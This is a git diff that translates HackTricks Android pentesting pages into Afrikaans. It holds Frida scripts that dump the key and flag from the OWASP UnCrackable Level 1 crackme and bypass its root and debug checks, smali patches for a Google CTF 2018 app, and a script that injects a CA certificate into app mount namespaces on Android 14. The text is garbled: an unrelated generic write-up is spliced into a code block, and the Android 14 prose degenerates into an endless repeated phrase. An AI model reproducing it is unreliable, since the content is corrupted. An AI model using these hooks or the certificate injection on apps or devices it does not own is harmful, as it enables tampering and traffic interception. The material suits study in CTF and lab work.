Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-​If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). +As jy belangstel in 'n **hack-loopbaan** en die onkraakbare wil kraak - **ons is aan die werf!** (_vloeiende skriftelike en gesproke Pools vereis_). {% embed url="https://www.stmcyber.com/careers" %} *** -**This is a summary of the post**: [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1)\ +**Hierdie is 'n opsomming van die pos**: [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1)\ **APK**: [https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level\_01/UnCrackable-Level1.apk](https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level\_01/UnCrackable-Level1.apk) -## Solution 1 +## Oplossing 1 -Based in [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1) - -**Hook the \_exit()**\_ function and **decrypt function** so it print the flag in frida console when you press verify: +Gebaseer op [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1) +**Haak die \_exit()**\_ funksie en **ontsleutel funksie** sodat dit die vlag in die frida-konsole druk wanneer jy op verify druk: ```javascript Java.perform(function () { - send("Starting hooks OWASP uncrackable1..."); +send("Starting hooks OWASP uncrackable1..."); - function getString(data){ - var ret = ""; - for (var i=0; i < data.length; i++){ - ret += "#" + data[i].toString(); - } - return ret - } +function getString(data){ +var ret = ""; +for (var i=0; i < data.length; i++){ +ret += "#" + data[i].toString(); +} +return ret +} - var aes_decrypt = Java.use("sg.vantagepoint.a.a"); - aes_decrypt.a.overload("[B","[B").implementation = function(var_0,var_1) { - send("sg.vantagepoint.a.a.a([B[B)[B doFinal(enc) // AES/ECB/PKCS7Padding"); - send("Key : " + getString(var_0)); - send("Encrypted : " + getString(var_1)); - var ret = this.a.overload("[B","[B").call(this,var_0,var_1); - send("Decrypted : " + getString(ret)); +var aes_decrypt = Java.use("sg.vantagepoint.a.a"); +aes_decrypt.a.overload("[B","[B").implementation = function(var_0,var_1) { +send("sg.vantagepoint.a.a.a([B[B)[B doFinal(enc) // AES/ECB/PKCS7Padding"); +send("Key : " + getString(var_0)); +send("Encrypted : " + getString(var_1)); +var ret = this.a.overload("[B","[B").call(this,var_0,var_1); +send("Decrypted : " + getString(ret)); - var flag = ""; - for (var i=0; i < ret.length; i++){ - flag += String.fromCharCode(ret[i]); - } - send("Decrypted flag: " + flag); - return ret; //[B - }; +var flag = ""; +for (var i=0; i < ret.length; i++){ +flag += String.fromCharCode(ret[i]); +} +send("Decrypted flag: " + flag); +return ret; //[B +}; - var sysexit = Java.use("java.lang.System"); - sysexit.exit.overload("int").implementation = function(var_0) { - send("java.lang.System.exit(I)V // We avoid exiting the application :)"); - }; +var sysexit = Java.use("java.lang.System"); +sysexit.exit.overload("int").implementation = function(var_0) { +send("java.lang.System.exit(I)V // We avoid exiting the application :)"); +}; - send("Hooks installed."); +send("Hooks installed."); }); ``` +## Oplossing 2 -## Solution 2 - -Based in [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1) - -**Hook rootchecks** and decrypt function so it print the flag in frida console when you press verify: +Gebaseer op [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1) +**Haak wortelkontroles** en ontsleutelfunksie sodat dit die vlag in die frida-konsole druk wanneer jy op verifieer druk: ```javascript Java.perform(function () { - send("Starting hooks OWASP uncrackable1..."); +send("Starting hooks OWASP uncrackable1..."); - function getString(data){ - var ret = ""; - for (var i=0; i < data.length; i++){ - ret += "#" + data[i].toString(); - } - return ret - } +function getString(data){ +var ret = ""; +for (var i=0; i < data.length; i++){ +ret += "#" + data[i].toString(); +} +return ret +} - var aes_decrypt = Java.use("sg.vantagepoint.a.a"); - aes_decrypt.a.overload("[B","[B").implementation = function(var_0,var_1) { - send("sg.vantagepoint.a.a.a([B[B)[B doFinal(enc) // AES/ECB/PKCS7Padding"); - send("Key : " + getString(var_0)); - send("Encrypted : " + getString(var_1)); - var ret = this.a.overload("[B","[B").call(this,var_0,var_1); - send("Decrypted : " + getString(ret)); +var aes_decrypt = Java.use("sg.vantagepoint.a.a"); +aes_decrypt.a.overload("[B","[B").implementation = function(var_0,var_1) { +send("sg.vantagepoint.a.a.a([B[B)[B doFinal(enc) // AES/ECB/PKCS7Padding"); +send("Key : " + getString(var_0)); +send("Encrypted : " + getString(var_1)); +var ret = this.a.overload("[B","[B").call(this,var_0,var_1); +send("Decrypted : " + getString(ret)); - var flag = ""; - for (var i=0; i < ret.length; i++){ - flag += String.fromCharCode(ret[i]); - } - send("Decrypted flag: " + flag); - return ret; //[B - }; +var flag = ""; +for (var i=0; i < ret.length; i++){ +flag += String.fromCharCode(ret[i]); +} +send("Decrypted flag: " + flag); +return ret; //[B +}; - var rootcheck1 = Java.use("sg.vantagepoint.a.c"); - rootcheck1.a.overload().implementation = function() { - send("sg.vantagepoint.a.c.a()Z Root check 1 HIT! su.exists()"); - return false; - }; +var rootcheck1 = Java.use("sg.vantagepoint.a.c"); +rootcheck1.a.overload().implementation = function() { +send("sg.vantagepoint.a.c.a()Z Root check 1 HIT! su.exists()"); +return false; +}; - var rootcheck2 = Java.use("sg.vantagepoint.a.c"); - rootcheck2.b.overload().implementation = function() { - send("sg.vantagepoint.a.c.b()Z Root check 2 HIT! test-keys"); - return false; - }; +var rootcheck2 = Java.use("sg.vantagepoint.a.c"); +rootcheck2.b.overload().implementation = function() { +send("sg.vantagepoint.a.c.b()Z Root check 2 HIT! test-keys"); +return false; +}; - var rootcheck3 = Java.use("sg.vantagepoint.a.c"); - rootcheck3.c.overload().implementation = function() { - send("sg.vantagepoint.a.c.c()Z Root check 3 HIT! Root packages"); - return false; - }; +var rootcheck3 = Java.use("sg.vantagepoint.a.c"); +rootcheck3.c.overload().implementation = function() { +send("sg.vantagepoint.a.c.c()Z Root check 3 HIT! Root packages"); +return false; +}; - var debugcheck = Java.use("sg.vantagepoint.a.b"); - debugcheck.a.overload("android.content.Context").implementation = function(var_0) { - send("sg.vantagepoint.a.b.a(Landroid/content/Context;)Z Debug check HIT! "); - return false; - }; +var debugcheck = Java.use("sg.vantagepoint.a.b"); +debugcheck.a.overload("android.content.Context").implementation = function(var_0) { +send("sg.vantagepoint.a.b.a(Landroid/content/Context;)Z Debug check HIT! "); +return false; +}; - send("Hooks installed."); +send("Hooks installed."); }); ``` -
-​​If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). +As jy belangstel in 'n **hackerloopbaan** en die onkraakbare wil kraak - **ons is aan die werf!** (_vloeiend in Pools skriftelik en mondeling vereis_). {% embed url="https://www.stmcyber.com/careers" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repositoriums.
diff --git a/mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md b/mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md index dab44e685..a7f3ffbcc 100644 --- a/mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md +++ b/mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md @@ -2,92 +2,118 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-Download the APK here: +Laai die APK hier af: -I am going to upload the APK to [https://appetize.io/](https://appetize.io) (free account) to see how the apk is behaving: +Ek gaan die APK oplaai na [https://appetize.io/](https://appetize.io) (gratis rekening) om te sien hoe die apk optree: ![](<../../.gitbook/assets/image (46).png>) -Looks like you need to win 1000000 times to get the flag. +Dit lyk asof jy 1000000 keer moet wen om die vlag te kry. -Following the steps from [pentesting Android](./) you can decompile the application to get the smali code and read the Java code using jadx. +Deur die stappe van [pentesting Android](./) te volg, kan jy die toepassing dekompilieer om die smali-kode te kry en die Java-kode te lees met behulp van jadx. -Reading the java code: +Lees die Java-kode: ![](<../../.gitbook/assets/image (47).png>) -It looks like the function that is going print the flag is **m().** +Dit lyk asof die funksie wat die vlag gaan druk **m()** is. -## **Smali changes** +## **Smali-veranderinge** -### **Call m() the first time** - -Lets make the application call m() if the variable _this.o != 1000000_ to do so, just cange the condition: +### **Roep m() die eerste keer aan** +Laat ons die toepassing m() laat roep as die veranderlike _this.o != 1000000_ is, om dit te doen, verander net die voorwaarde: ``` - if-ne v0, v9, :cond_2 +if-ne v0, v9, :cond_2 ``` +/hive/hacktricks/mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md -to: +# Shall we play a game? +## Introduction + +In this challenge, we are given an Android application called "Game". The goal is to find a flag hidden within the app. We will use various techniques to analyze the app and uncover the flag. + +## Decompiling the APK + +To begin, we need to decompile the APK file. We can use tools like JADX or apktool to accomplish this. Once decompiled, we can analyze the source code and look for any potential vulnerabilities. + +## Analyzing the Source Code + +After decompiling the APK, we can start analyzing the source code. We should look for any sensitive information that may be hardcoded, such as API keys or passwords. Additionally, we should search for any insecure data storage or communication methods. + +## Reverse Engineering + +If we are unable to find the flag through source code analysis, we can resort to reverse engineering the app. This involves disassembling the APK and analyzing the bytecode. Tools like JADX, JEB, or IDA Pro can be used for this purpose. + +## Dynamic Analysis + +Dynamic analysis involves running the app and monitoring its behavior in real-time. We can use tools like Frida or Xposed to hook into the app and intercept function calls or modify data. This can help us identify any hidden functionality or vulnerabilities. + +## Exploiting Vulnerabilities + +Once we have identified a vulnerability, we can proceed to exploit it. This may involve crafting malicious inputs, bypassing security measures, or manipulating the app's behavior to our advantage. The goal is to gain unauthorized access or extract the flag. + +## Conclusion + +In this challenge, we explored various techniques for analyzing and hacking an Android app. By decompiling the APK, analyzing the source code, reverse engineering, and performing dynamic analysis, we can uncover vulnerabilities and exploit them to achieve our goals. ``` - if-eq v0, v9, :cond_2 +if-eq v0, v9, :cond_2 ``` +![Voor](<../../.gitbook/assets/image (48).png>) -![Before](<../../.gitbook/assets/image (48).png>) +![Na](<../../.gitbook/assets/image (49).png>) -![After](<../../.gitbook/assets/image (49).png>) - -Follow the steps of [pentest Android](./) to recompile and sign the APK. Then, upload it to [https://appetize.io/](https://appetize.io) and lets see what happens: +Volg die stappe van [pentest Android](./) om die APK te herkompilieer en te onderteken. Laai dit dan op na [https://appetize.io/](https://appetize.io) en kyk wat gebeur: ![](<../../.gitbook/assets/image (50).png>) -Looks like the flag is written without being completely decrypted. Probably the m() function should be called 1000000 times. +Dit lyk asof die vlag geskryf is sonder om heeltemal ontsluit te word. Waarskynlik moet die m() funksie 1000000 keer geroep word. -**Other way** to do this is to not change the instrucction but change the compared instructions: +**'n Ander manier** om dit te doen, is om nie die instruksie te verander nie, maar om die vergelykingsinstruksies te verander: ![](<../../.gitbook/assets/image (55).png>) -**Another way** is instead of comparing with 1000000, set the value to 1 so this.o is compared with 1: +**'n Ander manier** is om in plaas daarvan met 1000000 te vergelyk, die waarde na 1 te stel sodat this.o met 1 vergelyk word: ![](<../../.gitbook/assets/image (57).png>) -A forth way is to add an instruction to move to value of v9(1000000) to v0 _(this.o)_: +'n Vierde manier is om 'n instruksie by te voeg om die waarde van v9(1000000) na v0 _(this.o)_ te skuif: ![](<../../.gitbook/assets/image (58).png>) ![](<../../.gitbook/assets/image (52).png>) -## Solution +## Oplossing -Make the application run the loop 100000 times when you win the first time. To do so, you only need to create the **:goto\_6** loop and make the application **jump there if `this.o`** does not value 100000\: +Maak die toepassing die lus 100000 keer loop as jy die eerste keer wen. Om dit te doen, hoef jy net die **:goto\_6** lus te skep en die toepassing **daarheen te laat spring as `this.o`** nie die waarde 100000 het nie\: ![](<../../.gitbook/assets/image (59).png>) -You need to do this inside a physical device as (I don't know why) this doesn't work in an emulated device. +Jy moet dit in 'n fisiese toestel doen, want (ek weet nie waarom nie) dit werk nie in 'n geëmuleerde toestel nie.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/mobile-pentesting/android-app-pentesting/install-burp-certificate.md b/mobile-pentesting/android-app-pentesting/install-burp-certificate.md index 857a1a03d..0cb016e4e 100644 --- a/mobile-pentesting/android-app-pentesting/install-burp-certificate.md +++ b/mobile-pentesting/android-app-pentesting/install-burp-certificate.md @@ -1,27 +1,27 @@ -# Install Burp Certificate +# Installeer Burp-sertifikaat
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## On a Virtual Machine +## Op 'n Virtuele Masjien -First of all you need to download the Der certificate from Burp. You can do this in _**Proxy**_ --> _**Options**_ --> _**Import / Export CA certificate**_ +Eerstens moet jy die Der-sertifikaat van Burp aflaai. Jy kan dit doen in _**Proxy**_ --> _**Options**_ --> _**Import / Export CA certificate**_ ![](<../../.gitbook/assets/image (367).png>) -**Export the certificate in Der format** and lets **transform** it to a form that **Android** is going to be able to **understand.** Note that **in order to configure the burp certificate on the Android machine in AVD** you need to **run** this machine **with** the **`-writable-system`** option.\ -For example you can run it like: +**Voer die sertifikaat uit in Der-formaat** en laat ons dit **omskep** na 'n vorm wat **Android** sal kan **verstaan.** Let daarop dat **om die burp-sertifikaat op die Android-masjien in AVD te konfigureer**, moet jy hierdie masjien **met die** **`-writable-system`**-opsie **uitvoer**.\ +Byvoorbeeld, jy kan dit so uitvoer: {% code overflow="wrap" %} ```bash @@ -29,7 +29,7 @@ C:\Users\\AppData\Local\Android\Sdk\tools\emulator.exe -avd "AVD9" -ht ``` {% endcode %} -Then, to **configure burps certificate do**: +Dan, om die sertifikaat van burp te **konfigureer**, doen die volgende: {% code overflow="wrap" %} ```bash @@ -44,41 +44,33 @@ adb reboot #Now, reboot the machine ``` {% endcode %} -Once the **machine finish rebooting** the burp certificate will be in use by it! +Sodra die **rekenaar klaar herlaai** het, sal die Burp-sertifikaat deur dit gebruik word! -## Using Magisc +## Gebruik van Magisc -If you **rooted your device with Magisc** (maybe an emulator), and you **can't follow** the previous **steps** to install the Burp cert because the **filesystem is read-only** and you cannot remount it writable, there is another way. +As jy jou toestel met Magisc **geroot** het (dalk 'n emulator), en jy **kan nie** die vorige **stappe** volg om die Burp-sertifikaat te installeer nie omdat die **lêersisteem skryfbeskerming** het en jy dit nie skryfbaar kan maak nie, is daar 'n ander manier. -Explained in [**this video**](https://www.youtube.com/watch?v=qQicUW0svB8) you need to: +Soos verduidelik in [**hierdie video**](https://www.youtube.com/watch?v=qQicUW0svB8) moet jy: -1. **Install a CA certificate**: Just **drag\&drop** the DER Burp certificate **changing the extension** to `.crt` in the mobile so it's stored in the Downloads folder and go to `Install a certificate` -> `CA certificate` +1. **Installeer 'n CA-sertifikaat**: Sleep die DER Burp-sertifikaat **met die verandering van die lêeruitbreiding** na `.crt` in die mobiele toestel sodat dit in die Aflaai-gevorderde gestoor word en gaan na `Installeer 'n sertifikaat` -> `CA-sertifikaat`
-* Check that the certificate was correctly stored going to `Trusted credentials` -> `USER` +* Kontroleer dat die sertifikaat korrek gestoor is deur na `Vertroude legitimasie` -> `GEBRUIKER` te gaan
-2. **Make it System trusted**: Download the Magisc module [MagiskTrustUserCerts](https://github.com/NVISOsecurity/MagiskTrustUserCerts) (a .zip file), **drag\&drop it** in the phone, go to the **Magics app** in the phone to the **`Modules`** section, click on **`Install from storage`**, select the `.zip` module and once installed **reboot** the phone: +2. **Maak dit Sisteem-vertrou**: Laai die Magisc-module [MagiskTrustUserCerts](https://github.com/NVISOsecurity/MagiskTrustUserCerts) ( 'n .zip-lêer) af, **sleep dit** na die foon, gaan na die **Magics-app** op die foon na die **`Modules`**-afdeling, klik op **`Installeer vanaf stoor`**, kies die `.zip`-module en nadat dit geïnstalleer is, **herlaai** die foon:
-* After rebooting, go to `Trusted credentials` -> `SYSTEM` and check the Postswigger cert is there +* Na herlaaiing, gaan na `Vertroude legitimasie` -> `SISTEEM` en kontroleer of die Postswigger-sertifikaat daar is
-## Post Android 14 - -In the latest Android 14 release, a significant shift has been observed in the handling of system-trusted Certificate Authority (CA) certificates. Previously, these certificates were housed in **`/system/etc/security/cacerts/`**, accessible and modifiable by users with root privileges, which allowed immediate application across the system. However, with Android 14, the storage location has been moved to **`/apex/com.android.conscrypt/cacerts`**, a directory within the **`/apex`** path, which is immutable by nature. - -Attempts to remount the **APEX cacerts path** as writable are met with failure, as the system does not allow such operations. Even attempts to unmount or overlay the directory with a temporary file system (tmpfs) do not circumvent the immutability; applications continue to access the original certificate data regardless of changes at the file system level. This resilience is due to the **`/apex`** mount being configured with PRIVATE propagation, ensuring that any modifications within the **`/apex`** directory do not affect other processes. - -The initialization of Android involves the `init` process, which, upon starting the operating system, also initiates the Zygote process. This process is responsible for launching application processes with a new mount namespace that includes a private **`/apex`** mount, thus isolating changes to this directory from other processes. - -Nevertheless, a workaround exists for those needing to modify the system-trusted CA certificates within the **`/apex`** directory. This involves manually remounting **`/apex`** to remove the PRIVATE propagation, thereby making it writable. The process includes copying the contents of **`/apex/com.android.conscrypt`** to another location, unmounting the **`/apex/com.android.conscrypt`** directory to eliminate the read-only constraint, and then restoring the contents to their original location within **`/apex`**. This approach requires swift action to avoid system crashes. To ensure system-wide application of these changes, it is recommended to restart the `system_server`, which effectively restarts all applications and brings the system to a consistent state. - +## Na Android 14 +In die nuutste Android 14 vrystelling is 'n beduidende verskuiwing waargeneem in die hantering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertif ```bash # Create a separate temp directory, to hold the current certificates # Otherwise, when we add the mount we can't read the current certs anymore. @@ -111,10 +103,10 @@ ZYGOTE64_PID=$(pidof zygote64 || true) # Apps inherit the Zygote's mounts at startup, so we inject here to ensure # all newly started apps will see these certs straight away: for Z_PID in "$ZYGOTE_PID" "$ZYGOTE64_PID"; do - if [ -n "$Z_PID" ]; then - nsenter --mount=/proc/$Z_PID/ns/mnt -- \ - /bin/mount --bind /system/etc/security/cacerts /apex/com.android.conscrypt/cacerts - fi +if [ -n "$Z_PID" ]; then +nsenter --mount=/proc/$Z_PID/ns/mnt -- \ +/bin/mount --bind /system/etc/security/cacerts /apex/com.android.conscrypt/cacerts +fi done # Then we inject the mount into all already running apps, so they @@ -122,60 +114,53 @@ done # Get the PID of every process whose parent is one of the Zygotes: APP_PIDS=$( - echo "$ZYGOTE_PID $ZYGOTE64_PID" | \ - xargs -n1 ps -o 'PID' -P | \ - grep -v PID +echo "$ZYGOTE_PID $ZYGOTE64_PID" | \ +xargs -n1 ps -o 'PID' -P | \ +grep -v PID ) # Inject into the mount namespace of each of those apps: for PID in $APP_PIDS; do - nsenter --mount=/proc/$PID/ns/mnt -- \ - /bin/mount --bind /system/etc/security/cacerts /apex/com.android.conscrypt/cacerts & +nsenter --mount=/proc/$PID/ns/mnt -- \ +/bin/mount --bind /system/etc/security/cacerts 